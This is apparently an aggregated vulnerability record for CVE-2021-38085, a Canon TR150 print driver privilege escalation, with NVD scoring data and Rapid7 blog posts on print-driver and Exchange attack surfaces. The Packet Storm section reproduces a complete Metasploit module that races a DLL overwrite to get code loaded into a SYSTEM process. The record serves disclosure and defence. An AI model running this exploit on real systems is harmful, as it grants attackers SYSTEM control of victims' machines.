The Canon TR150 print driver through 3.71.2.10 is vulnerable to a privilege escalation issue. During the add printer process, a local attacker can overwrite CNMurGE.dll and, if timed properly, the overwritten DLL will be loaded into a SYSTEM process resulting in escalation of privileges. This occurs because the driver drops a world-writable DLL into a CanonBJ %PROGRAMDATA% location that gets loaded by printisolationhost (a system process).
{"id": "CVE-2021-38085", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-38085", "description": "The Canon TR150 print driver through 3.71.2.10 is vulnerable to a privilege escalation issue. During the add printer process, a local attacker can overwrite CNMurGE.dll and, if timed properly, the overwritten DLL will be loaded into a SYSTEM process resulting in escalation of privileges. This occurs because the driver drops a world-writable DLL into a CanonBJ %PROGRAMDATA% location that gets loaded by printisolationhost (a system process).", "published": "2021-08-11T18:15:00", "modified": "2022-05-03T16:04:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38085", "reporter": "cve@mitre.org", "references": ["https://defcon.org/html/defcon-29/dc-29-speakers.html#baines", "http://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "https://raw.githubusercontent.com/jacob-baines/vuln_disclosure/main/vuln_2021_03.txt", 
"https://www.youtube.com/watch?v=vdesswZYz-8"], "cvelist": ["CVE-2021-38085"], "immutableFields": [], "lastseen": "2022-05-04T17:21:26", "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1358590931647264988"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/CANON_DRIVER_PRIVESC/"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163795"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057"]}], "rev": 4}, "score": {"value": 2.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1358590931647264988"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163795"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057"]}]}, "exploitation": null, "vulnersScore": 2.8}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:canon:pixma_tr150_firmware:3.71.2.10"], "cpe23": ["cpe:2.3:o:canon:pixma_tr150_firmware:3.71.2.10:*:*:*:*:*:*:*"], "cwe": ["CWE-732"], "affectedSoftware": [{"cpeName": "canon:pixma_tr150_firmware", "version": "3.71.2.10", "operator": "le", "name": "canon pixma tr150 firmware"}], "affectedConfiguration": [{"name": "canon pixma tr150", "cpeName": "canon:pixma_tr150", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:canon:pixma_tr150_firmware:3.71.2.10:*:*:*:*:*:*:*", "versionEndIncluding": "3.71.2.10", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:canon:pixma_tr150:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://defcon.org/html/defcon-29/dc-29-speakers.html#baines", 
"name": "https://defcon.org/html/defcon-29/dc-29-speakers.html#baines", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "name": "http://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://raw.githubusercontent.com/jacob-baines/vuln_disclosure/main/vuln_2021_03.txt", "name": "https://raw.githubusercontent.com/jacob-baines/vuln_disclosure/main/vuln_2021_03.txt", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://www.youtube.com/watch?v=vdesswZYz-8", "name": "https://www.youtube.com/watch?v=vdesswZYz-8", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"packetstorm": [{"lastseen": "2021-08-11T17:16:47", "description": "", "cvss3": {}, "published": "2021-08-11T00:00:00", "type": "packetstorm", "title": "Canon TR150 Driver 3.71.2.10 Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38085"], "modified": "2021-08-11T00:00:00", "id": "PACKETSTORM:163795", "href": "https://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Canon Driver Privilege Escalation', \n'Description' => %q{ \nCanon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files \nwithin the \"CanonBJ\" directory and its subdirectories. By overwriting the DLL at \nC:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll \nwith a malicious DLL at the right time whilst running the C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs \nscript to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program, \nwhich runs as NT AUTHORITY\\SYSTEM, to successfully load the malicious DLL. Successful exploitation \nwill grant attackers code execution as the NT AUTHORITY\\SYSTEM user. \n \nThis module leverages the prnmngr.vbs script \nto add and delete printers. Multiple runs of this \nmodule may be required given successful exploitation \nis time-sensitive. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Jacob Baines', # discovery, PoC, module \n'Shelby Pace' # original Ricoh module \n], \n'References' => \n[ \n['CVE', '2021-38085'], \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } \n] \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'Stability' => [ SERVICE_RESOURCE_LOSS ] \n}, \n'DisclosureDate' => '2021-08-07', \n'DefaultTarget' => 0 \n) \n) \n \nself.needs_cleanup = true \nend \n \ndef check \n@driver_path = '' \ndir_name = 'C:\\\\ProgramData\\\\CanonBJ\\\\IJPrinter\\\\CNMWINDOWS\\\\Canon TR150 series' \n \nreturn CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name) \n \nlanguage_dirs = dir(dir_name) \n \nreturn CheckCode::Detected(\"Detected Canon driver directory, but no language files. Its likely the driver is installed but a printer hasn't been added yet\") unless language_dirs.length \n \n@driver_path = dir_name \n@driver_path.concat('\\\\LanguageModules\\\\040C') \nres = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\") \nvulnerable = res.match(/\\\\Users:(?:\\(I\\))?\\(OI\\)\\(CI\\)\\(F\\)/) \n \nreturn CheckCode::Safe(\"#{@driver_path} directory does not exist or does not grant Users full permissions\") unless vulnerable \n \nvprint_status(\"Vulnerable language driver directory: #{@driver_path}\") \nCheckCode::Appears('Canon language driver directory grants Users full permissions') \nend \n \ndef add_printer(driver_name) \nfail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) \n \ndll_data = generate_payload_dll \ndll_path = \"#{@driver_path}\\\\CNMurGE.dll\" \n \ntemp_path = expand_path('%TEMP%\\\\CNMurGE.dll') \n \nbat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\") \ncp_cmd = \"copy /y \\\"#{temp_path}\\\" 
\\\"#{dll_path}\\\"\" \n \n# this script monitors the target dll for modification and then copies \n# over our malicious dll. As this is a time based attack, it won't \n# always be succuessful! \nbat_file = <<~HEREDOC \nattrib -a \"#{dll_path}\" \n:repeat \nfor %%i in (\"#{dll_path}\") do echo %%~ai | find \"a\" >nul || goto :repeat \ntimeout /t 1 \n#{cp_cmd} \nattrib -a \"#{dll_path}\" \nHEREDOC \n \nprint_status(\"Dropping batch script to #{bat_file_path}\") \nwrite_file(bat_file_path, bat_file) \n \nprint_status(\"Writing DLL file to #{temp_path}\") \nwrite_file(temp_path, dll_data) \nregister_files_for_cleanup(bat_file_path, temp_path) \n \nscript_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\" \nbat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\" \nvprint_status('Executing the batch script...') \nclient.sys.process.execute(bat_cmd, nil, { 'Hidden' => true }) \n \nprint_status(\"Adding printer #{@printer_name}...\") \ncmd_exec(script_cmd) \nrescue Rex::Post::Meterpreter::RequestError => e \nfail_with(Failure::Unknown, \"#{e.class} #{e.message}\") \nend \n \ndef exploit \nfail_with(Failure::None, 'Already running as SYSTEM') if is_system? 
\n \nfail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' \n \nif sysinfo['Architecture'] != payload.arch.first \nfail_with(Failure::BadConfig, 'The payload should use the same architecture as the target machine') \nend \n \n@printer_name = Rex::Text.rand_text_alpha(5..9) \n@script_path = 'C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs' \ndrvr_name = 'Canon TR150 series' \n \nadd_printer(drvr_name) \nend \n \ndef cleanup \nprint_status(\"Deleting printer #{@printer_name}\") \nsleep(3) \ndelete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\" \nclient.sys.process.execute(delete_cmd, nil, { 'Hidden' => true }) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163795/canon_driver_privesc.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-08-13T19:00:30", "description": "## Print Driver PrivEsc\n\n\n\nIf you attended DEF CON last week, you may have seen [this talk on print driver vulnerabilities](<https://www.youtube.com/watch?v=vdesswZYz-8>) from Metasploit community contributor [Jacob Baines](<https://github.com/jacob-baines>). In the spirit of Friday the 13th, we're highlighting some of these \"print nightmares\" again, in the form of two new Metasploit modules that Jacob added. \nThe first is a [Canon TR150 Print Driver Local Privilege Escalation module](<https://github.com/rapid7/metasploit-framework/pull/15520>), which exploits [CVE-2021-38085](<https://attackerkb.com/topics/m8dOqLxPtb/cve-2021-38085?referrer=blog>). The second is a [Lexmark Universal Print Driver Local Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15519>) module, which exploits [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>). 
Both modules target Windows systems with their respective vulnerable print drivers installed, and result in privilege escalation to a `SYSTEM` user.\n\n## Atlassian Crowd RCE\n\nAlso new in this week's release is an [Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE module](<https://github.com/rapid7/metasploit-framework/pull/15501>) by Rapid7's own [Grant Willcox](<https://github.com/gwillcox-r7>), which exploits [CVE-2019-11580](<https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580?referrer=blog>). This vulnerability allows an attacker to upload arbitrary plugins to vulnerable Atlassian Crowd data servers and achieve unauthenticated remote code execution. This module also includes a check method for verifying whether a target is vulnerable to this exploit. It should be noted that this vulnerability made the U.S. Cybersecurity and Infrastructure Security Agency\u2019s (CISA) list of the [12 most routinely exploited vulns for 2020](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>)).\n\n## New module content (3)\n\n * [Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/15501>) by Corben Leo, Grant Willcox, and Paul, which exploits [CVE-2019-11580](<https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580?referrer=blog>) \\- This adds an exploit for CVE-2019-11580 which is an unauthenticated RCE within the Atlassian Crowd application. The vulnerability allows for a malicious JAR file to be loaded, resulting in arbitrary Java code execution within the context of the service.\n * [Canon Driver Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15520>) by Jacob Baines and Shelby Pace, which exploits [CVE-2021-38085](<https://attackerkb.com/topics/m8dOqLxPtb/cve-2021-38085?referrer=blog>) \\- A new module has been added to exploit CVE-2021-38085, a privilege escalation issue in the Canon TR150 Print Driver. 
Successful exploitation results in code execution as the `SYSTEM` user.\n * [Lexmark Driver Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15519>) by Grant Willcox, Jacob Baines, and Shelby Pace, which exploits [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) \\- A new module has been added to exploit CVE-2021-35449, a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver. Successful exploitation allows local attackers to gain `SYSTEM` level code execution.\n\n## Enhancements and features\n\n * [#15327](<https://github.com/rapid7/metasploit-framework/pull/15327>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression issue in the RPC analyze command. Adds automated integration tests to ensure it doesn't break in the future.\n * [#15430](<https://github.com/rapid7/metasploit-framework/pull/15430>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds support for SSH pivoting by adding a new Command Shell session type for SSH clients. This also updates both `auxiliary/scanner/ssh/ssh_login` and `auxiliary/scanner/ssh/ssh_login_pubkey` modules to include these changes. 
Note that it only supports TCP client connections and only outbound payloads can be used through the SSH pivot at the moment (no reverse payloads).\n * [#15493](<https://github.com/rapid7/metasploit-framework/pull/15493>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Updated Metasploit's dependency on Rails from version 5.2 to 6.1\n * [#15523](<https://github.com/rapid7/metasploit-framework/pull/15523>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This enhances the console output with additional information on why a session may not be compatible with a post module, such as missing Meterpreter commands.\n * [#15535](<https://github.com/rapid7/metasploit-framework/pull/15535>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `psexec` module has been updated to use the `SMBSHARE` option name instead of `SHARE` for better consistency across modules. Users can still use the old `SHARE` option if needed, however this should be considered deprecated.\n\n## Bugs fixed\n\n * [#15524](<https://github.com/rapid7/metasploit-framework/pull/15524>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the `post/linux/gather/enum_network` module, caused by it searching for language-specific strings in the output to determine success.\n * [#15534](<https://github.com/rapid7/metasploit-framework/pull/15534>) from [timwr](<https://github.com/timwr>) \\- Fixes a regression issue in `post/multi/manage/shell_to_meterpreter` where the generated Powershell command length was greater than the limit of 8192 characters after string obfuscation was applied.\n * [#15536](<https://github.com/rapid7/metasploit-framework/pull/15536>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The HiveNightmare module has been updated to correctly use the `INTERATIONS` option instead of the `NBRE_ITER` option when performing the loop to call `check_path()`. 
This fixes an issue where the module would hang whilst users were running it, and ensures the loop correctly terminates after a set number of iterations.\n * [#15542](<https://github.com/rapid7/metasploit-framework/pull/15542>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a regression with Meterpreter's initialize methods, which caused Meterpreter scripts to be broken.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.56...6.1.0](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-04T11%3A50%3A27%2B01%3A00..2021-08-12T17%3A57%3A38%2B01%3A00%22>)\n * [Full diff 6.0.56...6.1.0](<https://github.com/rapid7/metasploit-framework/compare/6.0.56...6.1.0>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-08-13T18:25:09", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580", "CVE-2021-35449", "CVE-2021-38085"], "modified": "2021-08-13T18:25:09", "id": "RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "href": "https://blog.rapid7.com/2021/08/13/metasploit-wrap-up-125/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit 
chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). 
Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. 
ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. 
Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. 
Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * 
[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. 
Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: \"This attack is too easy.\" 
